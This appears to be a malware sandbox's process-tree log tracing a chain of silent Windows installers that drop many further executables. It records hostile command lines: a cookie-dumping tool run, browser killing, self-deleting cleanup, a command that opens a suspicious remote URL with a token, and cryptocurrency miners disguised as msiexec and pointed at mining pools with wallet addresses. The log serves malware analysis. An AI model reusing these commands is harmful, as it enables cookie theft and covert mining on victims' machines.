C:\Users\Admin\AppData\Local\Temp\is-4OVVD.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4OVVD.tmp\vict.tmp" /SL5="$401F8,870426,780800,C:\Users\Admin\AppData\Local\Temp\r3vmr5djc5p\vict.exe" /VERYSILENT /id=535
1⤵
PID:5656
- C:\Users\Admin\AppData\Local\Temp\is-COAT9.tmp\win1host.exe
  "C:\Users\Admin\AppData\Local\Temp\is-COAT9.tmp\win1host.exe" 535
  2⤵
  PID:5608
- - C:\Users\Admin\AppData\Local\Temp\zUTjNmzDy.exe
    "C:\Users\Admin\AppData\Local\Temp\zUTjNmzDy.exe"
    3⤵
    PID:6216
  - - C:\Users\Admin\AppData\Local\Temp\zUTjNmzDy.exe
      "C:\Users\Admin\AppData\Local\Temp\zUTjNmzDy.exe"
      4⤵
      PID:7064
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 620
    3⤵
    - Program crash
    PID:2480

C:\Users\Admin\AppData\Local\Temp\is-D7HAF.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D7HAF.tmp\vpn.tmp" /SL5="$2032E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\higtnac13oq\vpn.exe" /silent /subid=482
1⤵
PID:5696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
  2⤵
  PID:4544
- - C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
    tapinstall.exe remove tap0901
    3⤵
    PID:4300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
  2⤵
  PID:7048
- - C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
    tapinstall.exe install OemVista.inf tap0901
    3⤵
    PID:5300
- C:\Program Files (x86)\MaskVPN\mask_svc.exe
  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
  2⤵
  PID:3572
- C:\Program Files (x86)\MaskVPN\mask_svc.exe
  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
  2⤵
  PID:3608

C:\Users\Admin\AppData\Local\Temp\is-303BK.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-303BK.tmp\IBInstaller_97039.tmp" /SL5="$2034C,12322324,721408,C:\Users\Admin\AppData\Local\Temp\jsigpk3eda4\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
1⤵
PID:5756
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
  2⤵
  PID:5956
- C:\Users\Admin\AppData\Local\Temp\is-HAJ43.tmp\{app}\chrome_proxy.exe
  "C:\Users\Admin\AppData\Local\Temp\is-HAJ43.tmp\{app}\chrome_proxy.exe"
  2⤵
  PID:6012
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-HAJ43.tmp\{app}\chrome_proxy.exe"
    3⤵
    PID:744
  - - C:\Windows\SysWOW64\PING.EXE
      ping localhost -n 4
      4⤵
      Runs ping.exe
      PID:6040

C:\Users\Admin\AppData\Local\Temp\is-BR4JS.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BR4JS.tmp\Setup3310.tmp" /SL5="$30208,138429,56832,C:\Users\Admin\AppData\Local\Temp\4izeh0nvbjq\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:5592
- C:\Users\Admin\AppData\Local\Temp\is-PTNNN.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-PTNNN.tmp\Setup.exe" /Verysilent
  2⤵
  PID:6208
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
    3⤵
    PID:6444
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:5064
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4480
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
    3⤵
    PID:6496
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
    3⤵
    PID:6516
  - - C:\Users\Admin\AppData\Local\Temp\is-05MDP.tmp\LabPicV3.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-05MDP.tmp\LabPicV3.tmp" /SL5="$4035E,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
      4⤵
      PID:6752
    - - C:\Users\Admin\AppData\Local\Temp\is-SV1LD.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-SV1LD.tmp\ppppppfy.exe" /S /UID=lab214
        5⤵
        
        PID:6740
      - C:\Users\Admin\AppData\Local\Temp\4a-a015d-401-b9bb7-738c5b256be43\Haekadoshozhe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4a-a015d-401-b9bb7-738c5b256be43\Haekadoshozhe.exe"
        6⤵
        
        PID:4264
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nhiiojtz.ngi\md6_6ydj.exe & exit
        7⤵
        
        PID:6148
        
        C:\Users\Admin\AppData\Local\Temp\nhiiojtz.ngi\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\nhiiojtz.ngi\md6_6ydj.exe
        8⤵
        
        PID:7616
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tmlaauja.5xd\askinstall31.exe & exit
        7⤵
        
        PID:6880
        
        C:\Users\Admin\AppData\Local\Temp\tmlaauja.5xd\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\tmlaauja.5xd\askinstall31.exe
        8⤵
        
        PID:8092
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xrnew3pc.kz0\toolspab1.exe & exit
        7⤵
        
        PID:7368
        
        C:\Users\Admin\AppData\Local\Temp\xrnew3pc.kz0\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\xrnew3pc.kz0\toolspab1.exe
        8⤵
        
        PID:8172
        
        C:\Users\Admin\AppData\Local\Temp\xrnew3pc.kz0\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\xrnew3pc.kz0\toolspab1.exe
        9⤵
        
        PID:7972
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wuc2uanp.b5b\setup_10.2_mix.exe & exit
        7⤵
        
        PID:8072
        
        C:\Users\Admin\AppData\Local\Temp\wuc2uanp.b5b\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\wuc2uanp.b5b\setup_10.2_mix.exe
        8⤵
        
        PID:7568
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pljtbluk.rm4\GcleanerWW.exe /mixone & exit
        7⤵
        
        PID:7644
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\55ylykwz.u22\app.exe /8-2222 & exit
        7⤵
        
        PID:8096
        
        C:\Users\Admin\AppData\Local\Temp\55ylykwz.u22\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\55ylykwz.u22\app.exe /8-2222
        8⤵
        
        PID:8100
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\itcaauy1.r0q\file.exe & exit
        7⤵
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\itcaauy1.r0q\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\itcaauy1.r0q\file.exe
        8⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        9⤵
        
        PID:6708
        
        C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        10⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe" 1 3.1617397130.6067858a57311 101
        11⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe" 2 3.1617397130.6067858a57311
        12⤵
        
        PID:6484
        
        C:\Users\Admin\AppData\Local\Temp\dsbeepez30x\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dsbeepez30x\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\is-105GO.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-105GO.tmp\Setup3310.tmp" /SL5="$7036E,138429,56832,C:\Users\Admin\AppData\Local\Temp\dsbeepez30x\Setup3310.exe" /Verysilent /subid=577
        14⤵
        
        PID:5640
        
        C:\Users\Admin\AppData\Local\Temp\is-M17VA.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-M17VA.tmp\Setup.exe" /Verysilent
        15⤵
        
        PID:8328
        
        C:\Users\Admin\AppData\Local\Temp\jg4gfwjddic\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jg4gfwjddic\app.exe" /8-23
        13⤵
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\4gjkpjai0kg\u01iejlaacx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4gjkpjai0kg\u01iejlaacx.exe" /ustwo INSTALL
        13⤵
        
        PID:5908
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 884
        14⤵
        Program crash
        
        PID:7176
        
        C:\Users\Admin\AppData\Local\Temp\icmf1egbzqd\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\icmf1egbzqd\cpyrix.exe" /VERYSILENT
        13⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        14⤵
        
        PID:3500
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        14⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        15⤵
        
        PID:9004
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        15⤵
        
        PID:9064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        16⤵
        
        PID:6840
        
        C:\Users\Admin\AppData\Local\Temp\3pl1bj3v4ex\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3pl1bj3v4ex\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\is-B92FF.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-B92FF.tmp\vict.tmp" /SL5="$300CC,870426,780800,C:\Users\Admin\AppData\Local\Temp\3pl1bj3v4ex\vict.exe" /VERYSILENT /id=535
        14⤵
        
        PID:5464
        
        C:\Users\Admin\AppData\Local\Temp\is-0UHGC.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-0UHGC.tmp\win1host.exe" 535
        15⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\yfz5yqocphd\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yfz5yqocphd\vpn.exe" /silent /subid=482
        13⤵
        
        PID:7580
        
        C:\Users\Admin\AppData\Local\Temp\is-081PG.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-081PG.tmp\vpn.tmp" /SL5="$50624,15170975,270336,C:\Users\Admin\AppData\Local\Temp\yfz5yqocphd\vpn.exe" /silent /subid=482
        14⤵
        
        PID:8772
        
        C:\Users\Admin\AppData\Local\Temp\Z8HPFJQHOG\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Z8HPFJQHOG\setups.exe" ll
        10⤵
        
        PID:5488
        
        C:\Users\Admin\AppData\Local\Temp\is-VKFC0.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-VKFC0.tmp\setups.tmp" /SL5="$2061A,635399,250368,C:\Users\Admin\AppData\Local\Temp\Z8HPFJQHOG\setups.exe" ll
        11⤵
        
        PID:6312
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        9⤵
        
        PID:7312
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        9⤵
        
        PID:3420
        
        C:\Users\Admin\AppData\Roaming\4E65.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\4E65.tmp.exe"
        10⤵
        
        PID:7468
        
        C:\Users\Admin\AppData\Roaming\4E65.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\4E65.tmp.exe"
        11⤵
        
        PID:6424
        
        C:\Users\Admin\AppData\Roaming\550E.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\550E.tmp.exe"
        10⤵
        
        PID:8036
        
        C:\Users\Admin\AppData\Roaming\54A0.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\54A0.tmp.exe"
        10⤵
        
        PID:3160
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        11⤵
        
        PID:8832
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        11⤵
        
        PID:8792
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        10⤵
        
        PID:8896
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        11⤵
        Runs ping.exe
        
        PID:8316
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        9⤵
        
        PID:8956
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dr5fzj21.3ew\Four.exe & exit
        7⤵
        
        PID:6956
        
        C:\Users\Admin\AppData\Local\Temp\dr5fzj21.3ew\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\dr5fzj21.3ew\Four.exe
        8⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        9⤵
        
        PID:8144
        
        C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe" 1 3.1617397128.6067858874b84 104
        10⤵
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe" 2 3.1617397128.6067858874b84
        11⤵
        
        PID:6332
        
        C:\Users\Admin\AppData\Local\Temp\5wb4rvu3s5e\hv1zamvtadl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5wb4rvu3s5e\hv1zamvtadl.exe" /ustwo INSTALL
        12⤵
        
        PID:6780
        
        C:\Users\Admin\AppData\Local\Temp\2acpmiqoavm\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2acpmiqoavm\vpn.exe" /silent /subid=482
        12⤵
        
        PID:9212
        
        C:\Users\Admin\AppData\Local\Temp\is-AE5OM.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-AE5OM.tmp\vpn.tmp" /SL5="$20648,15170975,270336,C:\Users\Admin\AppData\Local\Temp\2acpmiqoavm\vpn.exe" /silent /subid=482
        13⤵
        
        PID:5332
        
        C:\Users\Admin\AppData\Local\Temp\pd32kkd31tf\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pd32kkd31tf\cpyrix.exe" /VERYSILENT
        12⤵
        
        PID:8868
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        13⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        13⤵
        
        PID:4396
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        14⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        14⤵
        
        PID:6188
        
        C:\Users\Admin\AppData\Local\Temp\wknvr34i1mc\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wknvr34i1mc\Setup3310.exe" /Verysilent /subid=577
        12⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\is-610OI.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-610OI.tmp\Setup3310.tmp" /SL5="$604D8,138429,56832,C:\Users\Admin\AppData\Local\Temp\wknvr34i1mc\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:8116
        
        C:\Users\Admin\AppData\Local\Temp\is-ICFD7.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-ICFD7.tmp\Setup.exe" /Verysilent
        14⤵
        
        PID:8804
        
        C:\Users\Admin\AppData\Local\Temp\ulfbezdvr0p\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ulfbezdvr0p\vict.exe" /VERYSILENT /id=535
        12⤵
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\is-3KVK0.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3KVK0.tmp\vict.tmp" /SL5="$20598,870426,780800,C:\Users\Admin\AppData\Local\Temp\ulfbezdvr0p\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:8572
        
        C:\Users\Admin\AppData\Local\Temp\is-NKQBK.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-NKQBK.tmp\win1host.exe" 535
        14⤵
        
        PID:7788
        
        C:\Users\Admin\AppData\Local\Temp\peuszhiemqu\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\peuszhiemqu\app.exe" /8-23
        12⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\F88WF5D950\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\F88WF5D950\setups.exe" ll
        9⤵
        
        PID:684
        
        C:\Users\Admin\AppData\Local\Temp\is-TQER4.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TQER4.tmp\setups.tmp" /SL5="$30726,635399,250368,C:\Users\Admin\AppData\Local\Temp\F88WF5D950\setups.exe" ll
        10⤵
        
        PID:4524
      - C:\Users\Admin\AppData\Local\Temp\44-62f69-726-64d90-854e83224c568\Nytivizhifo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\44-62f69-726-64d90-854e83224c568\Nytivizhifo.exe"
        6⤵
        
        PID:4832
      - C:\Program Files\Windows Multimedia Platform\SKMBESAZVY\prolab.exe
        
        "C:\Program Files\Windows Multimedia Platform\SKMBESAZVY\prolab.exe" /VERYSILENT
        6⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\is-KI8Q1.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KI8Q1.tmp\prolab.tmp" /SL5="$202B0,575243,216576,C:\Program Files\Windows Multimedia Platform\SKMBESAZVY\prolab.exe" /VERYSILENT
        7⤵
        
        PID:5296
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
    3⤵
    PID:6540
  - - C:\Users\Admin\AppData\Local\Temp\is-CPRH3.tmp\lylal220.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-CPRH3.tmp\lylal220.tmp" /SL5="$303C6,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
      4⤵
      PID:6892
    - - C:\Users\Admin\AppData\Local\Temp\is-2V1N2.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-2V1N2.tmp\Microsoft.exe" /S /UID=lylal220
        5⤵
        
        PID:6916
      - C:\Program Files\Common Files\ARGNUBZBCM\irecord.exe
        
        "C:\Program Files\Common Files\ARGNUBZBCM\irecord.exe" /VERYSILENT
        6⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\is-64QM5.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-64QM5.tmp\irecord.tmp" /SL5="$50070,6265333,408064,C:\Program Files\Common Files\ARGNUBZBCM\irecord.exe" /VERYSILENT
        7⤵
        
        PID:5176
      - C:\Users\Admin\AppData\Local\Temp\c7-0d54d-0e4-daf8d-8a18d4fbad9df\Joqyzhasire.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c7-0d54d-0e4-daf8d-8a18d4fbad9df\Joqyzhasire.exe"
        6⤵
        
        PID:6792
      - C:\Users\Admin\AppData\Local\Temp\77-0ee36-1ae-b7ba7-b04d1b9dc3b07\Vaekerosaepi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\77-0ee36-1ae-b7ba7-b04d1b9dc3b07\Vaekerosaepi.exe"
        6⤵
        
        PID:4632
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ang2mjio.f2d\md6_6ydj.exe & exit
        7⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\ang2mjio.f2d\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\ang2mjio.f2d\md6_6ydj.exe
        8⤵
        
        PID:7584
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hnqls52p.efp\askinstall31.exe & exit
        7⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\hnqls52p.efp\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\hnqls52p.efp\askinstall31.exe
        8⤵
        
        PID:7820
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:6620
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:3040
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q02ltuza.4gi\toolspab1.exe & exit
        7⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\q02ltuza.4gi\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\q02ltuza.4gi\toolspab1.exe
        8⤵
        
        PID:8028
        
        C:\Users\Admin\AppData\Local\Temp\q02ltuza.4gi\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\q02ltuza.4gi\toolspab1.exe
        9⤵
        
        PID:7604
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\thzf0tj0.s40\setup_10.2_mix.exe & exit
        7⤵
        
        PID:7504
        
        C:\Users\Admin\AppData\Local\Temp\thzf0tj0.s40\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\thzf0tj0.s40\setup_10.2_mix.exe
        8⤵
        
        PID:7832
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vv0opg3j.zcb\GcleanerWW.exe /mixone & exit
        7⤵
        
        PID:7020
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\miak2ycl.in3\app.exe /8-2222 & exit
        7⤵
        
        PID:5236
        
        C:\Users\Admin\AppData\Local\Temp\miak2ycl.in3\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\miak2ycl.in3\app.exe /8-2222
        8⤵
        
        PID:4944
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cknfro3w.340\file.exe & exit
        7⤵
        
        PID:6556
        
        C:\Users\Admin\AppData\Local\Temp\cknfro3w.340\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\cknfro3w.340\file.exe
        8⤵
        
        PID:7476
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
        9⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        10⤵
        
        PID:8136
        
        C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe" 1 3.1617397124.606785843cac6 101
        11⤵
        
        PID:3996
        
        C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe" 2 3.1617397124.606785843cac6
        12⤵
        
        PID:3124
        
        C:\Users\Admin\AppData\Local\Temp\3pictpkqza3\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3pictpkqza3\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:8368
        
        C:\Users\Admin\AppData\Local\Temp\is-TSULJ.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TSULJ.tmp\vict.tmp" /SL5="$2009C,870426,780800,C:\Users\Admin\AppData\Local\Temp\3pictpkqza3\vict.exe" /VERYSILENT /id=535
        14⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\is-E07B7.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-E07B7.tmp\win1host.exe" 535
        15⤵
        
        PID:5680
        
        C:\Users\Admin\AppData\Local\Temp\4a0v2axtzwa\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4a0v2axtzwa\app.exe" /8-23
        13⤵
        
        PID:8408
        
        C:\Users\Admin\AppData\Local\Temp\x0oxpivsg3d\u2tii3qc2ei.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x0oxpivsg3d\u2tii3qc2ei.exe" /ustwo INSTALL
        13⤵
        
        PID:7696
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 652
        14⤵
        Program crash
        
        PID:7300
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 676
        14⤵
        Program crash
        
        PID:7460
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 628
        14⤵
        Program crash
        
        PID:7668
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 960
        14⤵
        Program crash
        
        PID:5800
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 856
